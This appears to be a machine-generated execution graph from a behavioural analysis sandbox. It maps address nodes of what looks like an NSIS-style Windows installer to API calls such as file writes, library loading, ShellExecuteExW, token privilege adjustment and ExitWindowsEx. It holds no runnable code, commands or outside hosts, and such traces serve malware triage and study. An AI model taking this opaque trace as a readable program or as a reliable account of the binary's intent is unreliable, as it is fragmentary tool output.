                                                                                                                                                                                          execution_graph 3972 402643 3973 402672 3972->3973 3974 402657 3972->3974 3975 4026a2 3973->3975 3976 402677 3973->3976 3989 402d89 3974->3989 3979 402dab 21 API calls 3975->3979 3978 402dab 21 API calls 3976->3978 3980 40267e 3978->3980 3981 4026a9 lstrlenW 3979->3981 3992 406543 WideCharToMultiByte 3980->3992 3984 40265e 3981->3984 3983 402692 lstrlenA 3983->3984 3985 4026d6 3984->3985 3987 4026ec 3984->3987 3993 4060f2 SetFilePointer 3984->3993 3986 4060c3 WriteFile 3985->3986 3985->3987 3986->3987 3990 40655e 21 API calls 3989->3990 3991 402d9e 3990->3991 3991->3984 3992->3983 3994 40610e 3993->3994 4001 406126 3993->4001 3995 406094 ReadFile 3994->3995 3996 40611a 3995->3996 3997 406157 SetFilePointer 3996->3997 3998 40612f SetFilePointer 3996->3998 3996->4001 3997->4001 3998->3997 3999 40613a 3998->3999 4000 4060c3 WriteFile 3999->4000 4000->4001 4001->3985 3559 4015c6 3560 402dab 21 API calls 3559->3560 3561 4015cd 3560->3561 3579 405e9b CharNextW CharNextW 3561->3579 3563 401636 3565 401668 3563->3565 3566 40163b 3563->3566 3564 405e1d CharNextW 3570 4015d6 3564->3570 3569 401423 28 API calls 3565->3569 3585 401423 3566->3585 3576 401660 3569->3576 3570->3563 3570->3564 3575 4015ff 3570->3575 3577 40161c GetFileAttributesW 3570->3577 3589 405aec 3570->3589 3595 405acf CreateDirectoryW 3570->3595 3574 40164f SetCurrentDirectoryW 3574->3576 3575->3570 3592 405a75 CreateDirectoryW 3575->3592 3577->3570 3580 405eb8 3579->3580 3584 405eca 3579->3584 3582 405ec5 CharNextW 3580->3582 3580->3584 3581 405eee 3581->3570 3582->3581 3583 405e1d CharNextW 3583->3584 3584->3581 3584->3583 3586 4055a6 28 API calls 3585->3586 3587 401431 3586->3587 3588 406521 lstrcpynW 3587->3588 3588->3574 3590 406915 5 API calls 3589->3590 3591 405af3 3590->3591 3591->3570 3593 405ac1 3592->3593 3594 405ac5 GetLastError 3592->3594 3593->3575 3594->3593 3596 405ae3 GetLastError 3595->3596 3597 405adf 3595->3597 3596->3597 3597->3570 4008 401c48 4009 402d89 21 API calls 4008->4009 4010 401c4f 4009->4010 4011 402d89 21 API calls 4010->4011 4012 401c5c 4011->4012 4013 402dab 21 API calls 4012->4013 4016 401c71 4012->4016 4013->4016 4014 401cd8 4019 402dab 21 API calls 4014->4019 4015 401c8c 4018 402d89 21 API calls 4015->4018 4017 402dab 21 API calls 4016->4017 4020 401c81 4016->4020 4017->4020 4021 401c91 4018->4021 4022 401cdd 4019->4022 4020->4014 4020->4015 4023 402d89 21 API calls 4021->4023 4024 402dab 21 API calls 4022->4024 4025 401c9d 4023->4025 4026 401ce6 FindWindowExW 4024->4026 4027 401cc8 SendMessageW 4025->4027 4028 401caa SendMessageTimeoutW 4025->4028 4029 401d08 4026->4029 4027->4029 4028->4029 4037 4028c9 4038 4028cf 4037->4038 4039 4028d7 FindClose 4038->4039 4040 402c2f 4038->4040 4039->4040 4041 40494a 4042 404980 4041->4042 4043 40495a 4041->4043 4045 404507 8 API calls 4042->4045 4044 4044a0 22 API calls 4043->4044 4046 404967 SetDlgItemTextW 4044->4046 4047 40498c 4045->4047 4046->4042 4051 4016d1 4052 402dab 21 API calls 4051->4052 4053 4016d7 GetFullPathNameW 4052->4053 4054 4016f1 4053->4054 4060 401713 4053->4060 4057 40687e 2 API calls 4054->4057 4054->4060 4055 401728 GetShortPathNameW 4056 402c2f 4055->4056 4058 401703 4057->4058 4058->4060 4061 406521 lstrcpynW 4058->4061 4060->4055 4060->4056 4061->4060 4062 401e53 GetDC 4063 402d89 21 API calls 4062->4063 4064 401e65 GetDeviceCaps MulDiv ReleaseDC 4063->4064 4065 402d89 21 API calls 4064->4065 4066 401e96 4065->4066 4067 40655e 21 API calls 4066->4067 4068 401ed3 CreateFontIndirectW 4067->4068 4069 40263d 4068->4069 4070 402955 4071 402dab 21 API calls 4070->4071 4072 402961 4071->4072 4073 402977 4072->4073 4074 402dab 21 API calls 4072->4074 4075 405fec 2 API calls 4073->4075 4074->4073 4076 40297d 4075->4076 4098 406011 GetFileAttributesW CreateFileW 4076->4098 4078 40298a 4079 402a40 4078->4079 4080 4029a5 GlobalAlloc 4078->4080 4081 402a28 4078->4081 4082 402a47 DeleteFileW 4079->4082 4083 402a5a 4079->4083 4080->4081 4084 4029be 4080->4084 4085 4032b9 39 API calls 4081->4085 4082->4083 4099 4034b4 SetFilePointer 4084->4099 4087 402a35 CloseHandle 4085->4087 4087->4079 4088 4029c4 4089 40349e ReadFile 4088->4089 4090 4029cd GlobalAlloc 4089->4090 4091 402a11 4090->4091 4092 4029dd 4090->4092 4093 4060c3 WriteFile 4091->4093 4094 4032b9 39 API calls 4092->4094 4095 402a1d GlobalFree 4093->4095 4097 4029ea 4094->4097 4095->4081 4096 402a08 GlobalFree 4096->4091 4097->4096 4098->4078 4099->4088 4100 4045d6 lstrcpynW lstrlenW 4101 4014d7 4102 402d89 21 API calls 4101->4102 4103 4014dd Sleep 4102->4103 4105 402c2f 4103->4105 4106 40195b 4107 402dab 21 API calls 4106->4107 4108 401962 lstrlenW 4107->4108 4109 40263d 4108->4109 4110 4020dd 4111 4020ef 4110->4111 4121 4021a1 4110->4121 4112 402dab 21 API calls 4111->4112 4113 4020f6 4112->4113 4115 402dab 21 API calls 4113->4115 4114 401423 28 API calls 4116 4022fb 4114->4116 4117 4020ff 4115->4117 4118 402115 LoadLibraryExW 4117->4118 4119 402107 GetModuleHandleW 4117->4119 4120 402126 4118->4120 4118->4121 4119->4118 4119->4120 4130 406984 4120->4130 4121->4114 4124 402170 4126 4055a6 28 API calls 4124->4126 4125 402137 4127 401423 28 API calls 4125->4127 4128 402147 4125->4128 4126->4128 4127->4128 4128->4116 4129 402193 FreeLibrary 4128->4129 4129->4116 4135 406543 WideCharToMultiByte 4130->4135 4132 4069a1 4133 4069a8 GetProcAddress 4132->4133 4134 402131 4132->4134 4133->4134 4134->4124 4134->4125 4135->4132 4136 402b5e 4137 402bb0 4136->4137 4138 402b65 4136->4138 4139 406915 5 API calls 4137->4139 4140 402bae 4138->4140 4142 402d89 21 API calls 4138->4142 4141 402bb7 4139->4141 4143 402dab 21 API calls 4141->4143 4144 402b73 4142->4144 4145 402bc0 4143->4145 4146 402d89 21 API calls 4144->4146 4145->4140 4147 402bc4 IIDFromString 4145->4147 4149 402b7f 4146->4149 4147->4140 4148 402bd3 4147->4148 4148->4140 4154 406521 lstrcpynW 4148->4154 4153 406468 wsprintfW 4149->4153 4151 402bf0 CoTaskMemFree 4151->4140 4153->4140 4154->4151 4162 40465f 4163 404791 4162->4163 4165 404677 4162->4165 4164 4047fb 4163->4164 4166 4048c5 4163->4166 4171 4047cc GetDlgItem SendMessageW 4163->4171 4164->4166 4167 404805 GetDlgItem 4164->4167 4168 4044a0 22 API calls 4165->4168 4173 404507 8 API calls 4166->4173 4169 404886 4167->4169 4170 40481f 4167->4170 4172 4046de 4168->4172 4169->4166 4175 404898 4169->4175 4170->4169 4174 404845 SendMessageW LoadCursorW SetCursor 4170->4174 4195 4044c2 KiUserCallbackDispatcher 4171->4195 4177 4044a0 22 API calls 4172->4177 4184 4048c0 4173->4184 4199 40490e 4174->4199 4179 4048ae 4175->4179 4180 40489e SendMessageW 4175->4180 4182 4046eb CheckDlgButton 4177->4182 4179->4184 4185 4048b4 SendMessageW 4179->4185 4180->4179 4181 4047f6 4196 4048ea 4181->4196 4193 4044c2 KiUserCallbackDispatcher 4182->4193 4185->4184 4188 404709 GetDlgItem 4194 4044d5 SendMessageW 4188->4194 4190 40471f SendMessageW 4191 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4190->4191 4192 40473c GetSysColor 4190->4192 4191->4184 4192->4191 4193->4188 4194->4190 4195->4181 4197 4048f8 4196->4197 4198 4048fd SendMessageW 4196->4198 4197->4198 4198->4164 4202 405b47 ShellExecuteExW 4199->4202 4201 404874 LoadCursorW SetCursor 4201->4169 4202->4201 4203 402a60 4204 402d89 21 API calls 4203->4204 4205 402a66 4204->4205 4206 402aa9 4205->4206 4207 402a8d 4205->4207 4213 402933 4205->4213 4210 402ac3 4206->4210 4211 402ab3 4206->4211 4208 402a92 4207->4208 4209 402aa3 4207->4209 4217 406521 lstrcpynW 4208->4217 4209->4213 4218 406468 wsprintfW 4209->4218 4212 40655e 21 API calls 4210->4212 4214 402d89 21 API calls 4211->4214 4212->4209 4214->4209 4217->4213 4218->4213 3282 401761 3288 402dab 3282->3288 3286 40176f 3287 406040 2 API calls 3286->3287 3287->3286 3289 402db7 3288->3289 3290 40655e 21 API calls 3289->3290 3291 402dd8 3290->3291 3292 401768 3291->3292 3293 4067cf 5 API calls 3291->3293 3294 406040 3292->3294 3293->3292 3295 40604d GetTickCount GetTempFileNameW 3294->3295 3296 406087 3295->3296 3297 406083 3295->3297 3296->3286 3297->3295 3297->3296 4219 401d62 4220 402d89 21 API calls 4219->4220 4221 401d73 SetWindowLongW 4220->4221 4222 402c2f 4221->4222 4223 4028e3 4224 4028eb 4223->4224 4225 4028ef FindNextFileW 4224->4225 4227 402901 4224->4227 4226 402948 4225->4226 4225->4227 4229 406521 lstrcpynW 4226->4229 4229->4227 3504 4056e5 3505 405706 GetDlgItem GetDlgItem GetDlgItem 3504->3505 3506 40588f 3504->3506 3549 4044d5 SendMessageW 3505->3549 3508 4058c0 3506->3508 3509 405898 GetDlgItem CreateThread FindCloseChangeNotification 3506->3509 3510 4058eb 3508->3510 3512 405910 3508->3512 3513 4058d7 ShowWindow ShowWindow 3508->3513 3509->3508 3552 405679 OleInitialize 3509->3552 3514 40594b 3510->3514 3517 405925 ShowWindow 3510->3517 3518 4058ff 3510->3518 3511 405776 3515 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3511->3515 3519 404507 8 API calls 3512->3519 3551 4044d5 SendMessageW 3513->3551 3514->3512 3522 405959 SendMessageW 3514->3522 3520 4057eb 3515->3520 3521 4057cf SendMessageW SendMessageW 3515->3521 3525 405945 3517->3525 3526 405937 3517->3526 3523 404479 SendMessageW 3518->3523 3524 40591e 3519->3524 3527 4057f0 SendMessageW 3520->3527 3528 4057fe 3520->3528 3521->3520 3522->3524 3529 405972 CreatePopupMenu 3522->3529 3523->3512 3531 404479 SendMessageW 3525->3531 3530 4055a6 28 API calls 3526->3530 3527->3528 3533 4044a0 22 API calls 3528->3533 3532 40655e 21 API calls 3529->3532 3530->3525 3531->3514 3534 405982 AppendMenuW 3532->3534 3535 40580e 3533->3535 3536 4059b2 TrackPopupMenu 3534->3536 3537 40599f GetWindowRect 3534->3537 3538 405817 ShowWindow 3535->3538 3539 40584b GetDlgItem SendMessageW 3535->3539 3536->3524 3540 4059cd 3536->3540 3537->3536 3541 40583a 3538->3541 3542 40582d ShowWindow 3538->3542 3539->3524 3543 405872 SendMessageW SendMessageW 3539->3543 3544 4059e9 SendMessageW 3540->3544 3550 4044d5 SendMessageW 3541->3550 3542->3541 3543->3524 3544->3544 3545 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3544->3545 3547 405a2b SendMessageW 3545->3547 3547->3547 3548 405a54 GlobalUnlock SetClipboardData CloseClipboard 3547->3548 3548->3524 3549->3511 3550->3539 3551->3510 3553 4044ec SendMessageW 3552->3553 3554 40569c 3553->3554 3557 401389 2 API calls 3554->3557 3558 4056c3 3554->3558 3555 4044ec SendMessageW 3556 4056d5 OleUninitialize 3555->3556 3557->3554 3558->3555 4230 404ce7 4231 404d13 4230->4231 4232 404cf7 4230->4232 4234 404d46 4231->4234 4235 404d19 SHGetPathFromIDListW 4231->4235 4241 405b65 GetDlgItemTextW 4232->4241 4236 404d30 SendMessageW 4235->4236 4237 404d29 4235->4237 4236->4234 4239 40140b 2 API calls 4237->4239 4238 404d04 SendMessageW 4238->4231 4239->4236 4241->4238 4242 401568 4243 402ba9 4242->4243 4246 406468 wsprintfW 4243->4246 4245 402bae 4246->4245 4247 40196d 4248 402d89 21 API calls 4247->4248 4249 401974 4248->4249 4250 402d89 21 API calls 4249->4250 4251 401981 4250->4251 4252 402dab 21 API calls 4251->4252 4253 401998 lstrlenW 4252->4253 4254 4019a9 4253->4254 4255 4019ea 4254->4255 4259 406521 lstrcpynW 4254->4259 4257 4019da 4257->4255 4258 4019df lstrlenW 4257->4258 4258->4255 4259->4257 4260 40166f 4261 402dab 21 API calls 4260->4261 4262 401675 4261->4262 4263 40687e 2 API calls 4262->4263 4264 40167b 4263->4264 4265 402af0 4266 402d89 21 API calls 4265->4266 4267 402af6 4266->4267 4268 40655e 21 API calls 4267->4268 4269 402933 4267->4269 4268->4269 4270 4026f1 4271 402d89 21 API calls 4270->4271 4279 402700 4271->4279 4272 40274a ReadFile 4272->4279 4282 40283d 4272->4282 4273 406094 ReadFile 4273->4279 4274 40278a MultiByteToWideChar 4274->4279 4275 40283f 4283 406468 wsprintfW 4275->4283 4276 4060f2 5 API calls 4276->4279 4278 4027b0 SetFilePointer MultiByteToWideChar 4278->4279 4279->4272 4279->4273 4279->4274 4279->4275 4279->4276 4279->4278 4280 402850 4279->4280 4279->4282 4281 402871 SetFilePointer 4280->4281 4280->4282 4281->4282 4283->4282 3407 401774 3408 402dab 21 API calls 3407->3408 3409 40177b 3408->3409 3410 4017a3 3409->3410 3411 40179b 3409->3411 3482 406521 lstrcpynW 3410->3482 3481 406521 lstrcpynW 3411->3481 3414 4017a1 3418 4067cf 5 API calls 3414->3418 3415 4017ae 3483 405df0 lstrlenW CharPrevW 3415->3483 3434 4017c0 3418->3434 3422 4017d2 CompareFileTime 3422->3434 3423 401892 3449 4055a6 3423->3449 3424 401869 3426 4055a6 28 API calls 3424->3426 3436 40187e 3424->3436 3426->3436 3430 406521 lstrcpynW 3430->3434 3431 4018c3 SetFileTime 3432 4018d5 FindCloseChangeNotification 3431->3432 3435 4018e6 3432->3435 3432->3436 3433 40655e 21 API calls 3433->3434 3434->3422 3434->3423 3434->3424 3434->3430 3434->3433 3441 405b81 MessageBoxIndirectW 3434->3441 3445 405fec GetFileAttributesW 3434->3445 3448 406011 GetFileAttributesW CreateFileW 3434->3448 3486 40687e FindFirstFileW 3434->3486 3437 4018eb 3435->3437 3438 4018fe 3435->3438 3439 40655e 21 API calls 3437->3439 3440 40655e 21 API calls 3438->3440 3442 4018f3 lstrcatW 3439->3442 3443 401906 3440->3443 3441->3434 3442->3443 3444 405b81 MessageBoxIndirectW 3443->3444 3444->3436 3446 40600b 3445->3446 3447 405ffe SetFileAttributesW 3445->3447 3446->3434 3447->3446 3448->3434 3450 4055c1 3449->3450 3458 40189c 3449->3458 3451 4055dd lstrlenW 3450->3451 3452 40655e 21 API calls 3450->3452 3453 405606 3451->3453 3454 4055eb lstrlenW 3451->3454 3452->3451 3456 405619 3453->3456 3457 40560c SetWindowTextW 3453->3457 3455 4055fd lstrcatW 3454->3455 3454->3458 3455->3453 3456->3458 3459 40561f SendMessageW SendMessageW SendMessageW 3456->3459 3457->3456 3460 4032b9 3458->3460 3459->3458 3462 4032d2 3460->3462 3461 4032fd 3489 40349e 3461->3489 3462->3461 3501 4034b4 SetFilePointer 3462->3501 3466 40331a GetTickCount 3477 40332d 3466->3477 3467 40343e 3468 403442 3467->3468 3472 40345a 3467->3472 3470 40349e ReadFile 3468->3470 3469 4018af 3469->3431 3469->3432 3470->3469 3471 40349e ReadFile 3471->3472 3472->3469 3472->3471 3474 4060c3 WriteFile 3472->3474 3473 40349e ReadFile 3473->3477 3474->3472 3476 403393 GetTickCount 3476->3477 3477->3469 3477->3473 3477->3476 3478 4033bc MulDiv wsprintfW 3477->3478 3492 406a90 3477->3492 3499 4060c3 WriteFile 3477->3499 3479 4055a6 28 API calls 3478->3479 3479->3477 3481->3414 3482->3415 3484 4017b4 lstrcatW 3483->3484 3485 405e0c lstrcatW 3483->3485 3484->3414 3485->3484 3487 406894 FindClose 3486->3487 3488 40689f 3486->3488 3487->3488 3488->3434 3502 406094 ReadFile 3489->3502 3493 406ab5 3492->3493 3494 406abd 3492->3494 3493->3477 3494->3493 3495 406b44 GlobalFree 3494->3495 3496 406b4d GlobalAlloc 3494->3496 3497 406bc4 GlobalAlloc 3494->3497 3498 406bbb GlobalFree 3494->3498 3495->3496 3496->3493 3496->3494 3497->3493 3497->3494 3498->3497 3500 4060e1 3499->3500 3500->3477 3501->3461 3503 403308 3502->3503 3503->3466 3503->3467 3503->3469 4298 4014f5 SetForegroundWindow 4299 402c2f 4298->4299 4300 401a77 4301 402d89 21 API calls 4300->4301 4302 401a80 4301->4302 4303 402d89 21 API calls 4302->4303 4304 401a25 4303->4304 4305 401578 4306 401591 4305->4306 4307 401588 ShowWindow 4305->4307 4308 402c2f 4306->4308 4309 40159f ShowWindow 4306->4309 4307->4306 4309->4308 4310 4023f9 4311 402dab 21 API calls 4310->4311 4312 402408 4311->4312 4313 402dab 21 API calls 4312->4313 4314 402411 4313->4314 4315 402dab 21 API calls 4314->4315 4316 40241b GetPrivateProfileStringW 4315->4316 4317 401ffb 4318 402dab 21 API calls 4317->4318 4319 402002 4318->4319 4320 40687e 2 API calls 4319->4320 4321 402008 4320->4321 4323 402019 4321->4323 4324 406468 wsprintfW 4321->4324 4324->4323 3756 4034fc SetErrorMode GetVersionExW 3757 403550 GetVersionExW 3756->3757 3758 403588 3756->3758 3757->3758 3759 4035df 3758->3759 3760 406915 5 API calls 3758->3760 3761 4068a5 3 API calls 3759->3761 3760->3759 3762 4035f5 lstrlenA 3761->3762 3762->3759 3763 403605 3762->3763 3764 406915 5 API calls 3763->3764 3765 40360c 3764->3765 3766 406915 5 API calls 3765->3766 3767 403613 3766->3767 3768 406915 5 API calls 3767->3768 3769 40361f #17 OleInitialize SHGetFileInfoW 3768->3769 3844 406521 lstrcpynW 3769->3844 3772 40366e GetCommandLineW 3845 406521 lstrcpynW 3772->3845 3774 403680 3775 405e1d CharNextW 3774->3775 3776 4036a6 CharNextW 3775->3776 3782 4036b8 3776->3782 3777 4037ba 3778 4037ce GetTempPathW 3777->3778 3846 4034cb 3778->3846 3780 4037e6 3783 403840 DeleteFileW 3780->3783 3784 4037ea GetWindowsDirectoryW lstrcatW 3780->3784 3781 405e1d CharNextW 3781->3782 3782->3777 3782->3781 3790 4037bc 3782->3790 3856 403082 GetTickCount GetModuleFileNameW 3783->3856 3786 4034cb 12 API calls 3784->3786 3788 403806 3786->3788 3787 403854 3791 403a47 ExitProcess OleUninitialize 3787->3791 3798 405e1d CharNextW 3787->3798 3827 4038fb 3787->3827 3788->3783 3789 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3788->3789 3792 4034cb 12 API calls 3789->3792 3940 406521 lstrcpynW 3790->3940 3793 403a59 3791->3793 3794 403a7d 3791->3794 3796 403838 3792->3796 3797 405b81 MessageBoxIndirectW 3793->3797 3799 403b01 ExitProcess 3794->3799 3800 403a85 GetCurrentProcess OpenProcessToken 3794->3800 3796->3783 3796->3791 3803 403a67 ExitProcess 3797->3803 3810 403873 3798->3810 3804 403ad1 3800->3804 3805 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3800->3805 3807 406915 5 API calls 3804->3807 3805->3804 3806 40390b 3806->3791 3811 403ad8 3807->3811 3808 4038d1 3812 405ef8 18 API calls 3808->3812 3809 403914 3813 405aec 5 API calls 3809->3813 3810->3808 3810->3809 3814 403aed ExitWindowsEx 3811->3814 3816 403afa 3811->3816 3815 4038dd 3812->3815 3817 403919 lstrlenW 3813->3817 3814->3799 3814->3816 3815->3791 3941 406521 lstrcpynW 3815->3941 3818 40140b 2 API calls 3816->3818 3943 406521 lstrcpynW 3817->3943 3818->3799 3821 403933 3822 40393c 3821->3822 3831 40394b 3821->3831 3944 406521 lstrcpynW 3822->3944 3823 4038f0 3942 406521 lstrcpynW 3823->3942 3826 403971 wsprintfW 3828 40655e 21 API calls 3826->3828 3884 403bf3 3827->3884 3828->3831 3829 405a75 2 API calls 3829->3831 3830 405acf 2 API calls 3830->3831 3831->3826 3831->3829 3831->3830 3832 4039e7 SetCurrentDirectoryW 3831->3832 3833 4039ad GetFileAttributesW 3831->3833 3836 4039e5 3831->3836 3838 405c2d 71 API calls 3831->3838 3839 4062e1 40 API calls 3831->3839 3840 40655e 21 API calls 3831->3840 3841 405b04 2 API calls 3831->3841 3842 403a6f CloseHandle 3831->3842 3843 40687e 2 API calls 3831->3843 3834 4062e1 40 API calls 3832->3834 3833->3831 3835 4039b9 DeleteFileW 3833->3835 3837 4039f6 CopyFileW 3834->3837 3835->3831 3836->3791 3837->3831 3837->3836 3838->3831 3839->3831 3840->3831 3841->3831 3842->3836 3843->3831 3844->3772 3845->3774 3847 4067cf 5 API calls 3846->3847 3848 4034d7 3847->3848 3849 4034e1 3848->3849 3850 405df0 3 API calls 3848->3850 3849->3780 3851 4034e9 3850->3851 3852 405acf 2 API calls 3851->3852 3853 4034ef 3852->3853 3854 406040 2 API calls 3853->3854 3855 4034fa 3854->3855 3855->3780 3945 406011 GetFileAttributesW CreateFileW 3856->3945 3858 4030c2 3879 4030d2 3858->3879 3946 406521 lstrcpynW 3858->3946 3860 4030e8 3861 405e3c 2 API calls 3860->3861 3862 4030ee 3861->3862 3947 406521 lstrcpynW 3862->3947 3864 4030f9 GetFileSize 3865 4031f3 3864->3865 3877 403110 3864->3877 3948 40301e 3865->3948 3867 4031fc 3869 40322c GlobalAlloc 3867->3869 3867->3879 3960 4034b4 SetFilePointer 3867->3960 3868 40349e ReadFile 3868->3877 3959 4034b4 SetFilePointer 3869->3959 3871 40325f 3875 40301e 6 API calls 3871->3875 3873 403215 3876 40349e ReadFile 3873->3876 3874 403247 3878 4032b9 39 API calls 3874->3878 3875->3879 3880 403220 3876->3880 3877->3865 3877->3868 3877->3871 3877->3879 3881 40301e 6 API calls 3877->3881 3882 403253 3878->3882 3879->3787 3880->3869 3880->3879 3881->3877 3882->3879 3882->3882 3883 403290 SetFilePointer 3882->3883 3883->3879 3885 406915 5 API calls 3884->3885 3886 403c07 3885->3886 3887 403c0d GetUserDefaultUILanguage 3886->3887 3888 403c1f 3886->3888 3961 406468 wsprintfW 3887->3961 3890 4063ef 3 API calls 3888->3890 3892 403c4f 3890->3892 3891 403c1d 3962 403ec9 3891->3962 3893 403c6e lstrcatW 3892->3893 3894 4063ef 3 API calls 3892->3894 3893->3891 3894->3893 3897 405ef8 18 API calls 3898 403ca0 3897->3898 3899 403d34 3898->3899 3902 4063ef 3 API calls 3898->3902 3900 405ef8 18 API calls 3899->3900 3901 403d3a 3900->3901 3904 403d4a LoadImageW 3901->3904 3905 40655e 21 API calls 3901->3905 3903 403cd2 3902->3903 3903->3899 3908 403cf3 lstrlenW 3903->3908 3911 405e1d CharNextW 3903->3911 3906 403df0 3904->3906 3907 403d71 RegisterClassW 3904->3907 3905->3904 3910 40140b 2 API calls 3906->3910 3909 403da7 SystemParametersInfoW CreateWindowExW 3907->3909 3939 403dfa 3907->3939 3912 403d01 lstrcmpiW 3908->3912 3913 403d27 3908->3913 3909->3906 3914 403df6 3910->3914 3915 403cf0 3911->3915 3912->3913 3916 403d11 GetFileAttributesW 3912->3916 3917 405df0 3 API calls 3913->3917 3919 403ec9 22 API calls 3914->3919 3914->3939 3915->3908 3918 403d1d 3916->3918 3920 403d2d 3917->3920 3918->3913 3921 405e3c 2 API calls 3918->3921 3922 403e07 3919->3922 3970 406521 lstrcpynW 3920->3970 3921->3913 3924 403e13 ShowWindow 3922->3924 3925 403e96 3922->3925 3927 4068a5 3 API calls 3924->3927 3926 405679 5 API calls 3925->3926 3929 403e9c 3926->3929 3928 403e2b 3927->3928 3930 403e39 GetClassInfoW 3928->3930 3933 4068a5 3 API calls 3928->3933 3931 403ea0 3929->3931 3932 403eb8 3929->3932 3935 403e63 DialogBoxParamW 3930->3935 3936 403e4d GetClassInfoW RegisterClassW 3930->3936 3938 40140b 2 API calls 3931->3938 3931->3939 3934 40140b 2 API calls 3932->3934 3933->3930 3934->3939 3937 40140b 2 API calls 3935->3937 3936->3935 3937->3939 3938->3939 3939->3806 3940->3778 3941->3823 3942->3827 3943->3821 3944->3831 3945->3858 3946->3860 3947->3864 3949 403027 3948->3949 3950 40303f 3948->3950 3951 403030 DestroyWindow 3949->3951 3952 403037 3949->3952 3953 403047 3950->3953 3954 40304f GetTickCount 3950->3954 3951->3952 3952->3867 3955 406951 2 API calls 3953->3955 3956 403080 3954->3956 3957 40305d CreateDialogParamW ShowWindow 3954->3957 3958 40304d 3955->3958 3956->3867 3957->3956 3958->3867 3959->3874 3960->3873 3961->3891 3963 403edd 3962->3963 3971 406468 wsprintfW 3963->3971 3965 403f4e 3966 403f82 22 API calls 3965->3966 3968 403f53 3966->3968 3967 403c7e 3967->3897 3968->3967 3969 40655e 21 API calls 3968->3969 3969->3968 3970->3899 3971->3965 4325 401b7c 4326 402dab 21 API calls 4325->4326 4327 401b83 4326->4327 4328 402d89 21 API calls 4327->4328 4329 401b8c wsprintfW 4328->4329 4330 402c2f 4329->4330 4338 401000 4339 401037 BeginPaint GetClientRect 4338->4339 4340 40100c DefWindowProcW 4338->4340 4342 4010f3 4339->4342 4345 401179 4340->4345 4343 401073 CreateBrushIndirect FillRect DeleteObject 4342->4343 4344 4010fc 4342->4344 4343->4342 4346 401102 CreateFontIndirectW 4344->4346 4347 401167 EndPaint 4344->4347 4346->4347 4348 401112 6 API calls 4346->4348 4347->4345 4348->4347 4349 401680 4350 402dab 21 API calls 4349->4350 4351 401687 4350->4351 4352 402dab 21 API calls 4351->4352 4353 401690 4352->4353 4354 402dab 21 API calls 4353->4354 4355 401699 MoveFileW 4354->4355 4356 4016ac 4355->4356 4362 4016a5 4355->4362 4358 40687e 2 API calls 4356->4358 4360 4022fb 4356->4360 4357 401423 28 API calls 4357->4360 4359 4016bb 4358->4359 4359->4360 4361 4062e1 40 API calls 4359->4361 4361->4362 4362->4357 4363 401503 4364 401520 4363->4364 4365 401508 4363->4365 4366 402d89 21 API calls 4365->4366 4366->4364 4367 401a04 4368 402dab 21 API calls 4367->4368 4369 401a0b 4368->4369 4370 402dab 21 API calls 4369->4370 4371 401a14 4370->4371 4372 401a1b lstrcmpiW 4371->4372 4373 401a2d lstrcmpW 4371->4373 4374 401a21 4372->4374 4373->4374 4375 402304 4376 402dab 21 API calls 4375->4376 4377 40230a 4376->4377 4378 402dab 21 API calls 4377->4378 4379 402313 4378->4379 4380 402dab 21 API calls 4379->4380 4381 40231c 4380->4381 4382 40687e 2 API calls 4381->4382 4383 402325 4382->4383 4384 402336 lstrlenW lstrlenW 4383->4384 4385 402329 4383->4385 4386 4055a6 28 API calls 4384->4386 4387 4055a6 28 API calls 4385->4387 4389 402331 4385->4389 4388 402374 SHFileOperationW 4386->4388 4387->4389 4388->4385 4388->4389 4390 401d86 4391 401d99 GetDlgItem 4390->4391 4392 401d8c 4390->4392 4394 401d93 4391->4394 4393 402d89 21 API calls 4392->4393 4393->4394 4395 401dda GetClientRect LoadImageW SendMessageW 4394->4395 4396 402dab 21 API calls 4394->4396 4398 401e38 4395->4398 4400 401e44 4395->4400 4396->4395 4399 401e3d DeleteObject 4398->4399 4398->4400 4399->4400 4401 402388 4402 40238f 4401->4402 4406 4023a2 4401->4406 4403 40655e 21 API calls 4402->4403 4404 40239c 4403->4404 4405 405b81 MessageBoxIndirectW 4404->4405 4405->4406 4407 402c0a SendMessageW 4408 402c24 InvalidateRect 4407->4408 4409 402c2f 4407->4409 4408->4409 4417 404f0d GetDlgItem GetDlgItem 4418 404f5f 7 API calls 4417->4418 4430 405184 4417->4430 4419 405006 DeleteObject 4418->4419 4420 404ff9 SendMessageW 4418->4420 4421 40500f 4419->4421 4420->4419 4422 405046 4421->4422 4426 40655e 21 API calls 4421->4426 4423 4044a0 22 API calls 4422->4423 4427 40505a 4423->4427 4424 405312 4428 405324 4424->4428 4429 40531c SendMessageW 4424->4429 4425 405266 4425->4424 4433 4052bf SendMessageW 4425->4433 4460 405177 4425->4460 4431 405028 SendMessageW SendMessageW 4426->4431 4432 4044a0 22 API calls 4427->4432 4440 405336 ImageList_Destroy 4428->4440 4441 40533d 4428->4441 4449 40534d 4428->4449 4429->4428 4430->4425 4447 4051f3 4430->4447 4471 404e5b SendMessageW 4430->4471 4431->4421 4448 40506b 4432->4448 4438 4052d4 SendMessageW 4433->4438 4433->4460 4434 405258 SendMessageW 4434->4425 4435 404507 8 API calls 4439 405513 4435->4439 4437 4054c7 4445 4054d9 ShowWindow GetDlgItem ShowWindow 4437->4445 4437->4460 4444 4052e7 4438->4444 4440->4441 4442 405346 GlobalFree 4441->4442 4441->4449 4442->4449 4443 405146 GetWindowLongW SetWindowLongW 4446 40515f 4443->4446 4455 4052f8 SendMessageW 4444->4455 4445->4460 4450 405164 ShowWindow 4446->4450 4451 40517c 4446->4451 4447->4425 4447->4434 4448->4443 4454 4050be SendMessageW 4448->4454 4456 405141 4448->4456 4457 405110 SendMessageW 4448->4457 4458 4050fc SendMessageW 4448->4458 4449->4437 4464 405388 4449->4464 4476 404edb 4449->4476 4469 4044d5 SendMessageW 4450->4469 4470 4044d5 SendMessageW 4451->4470 4454->4448 4455->4424 4456->4443 4456->4446 4457->4448 4458->4448 4460->4435 4461 405492 4462 40549d InvalidateRect 4461->4462 4465 4054a9 4461->4465 4462->4465 4463 4053b6 SendMessageW 4468 4053cc 4463->4468 4464->4463 4464->4468 4465->4437 4485 404e16 4465->4485 4467 405440 SendMessageW SendMessageW 4467->4468 4468->4461 4468->4467 4469->4460 4470->4430 4472 404eba SendMessageW 4471->4472 4473 404e7e GetMessagePos ScreenToClient SendMessageW 4471->4473 4474 404eb2 4472->4474 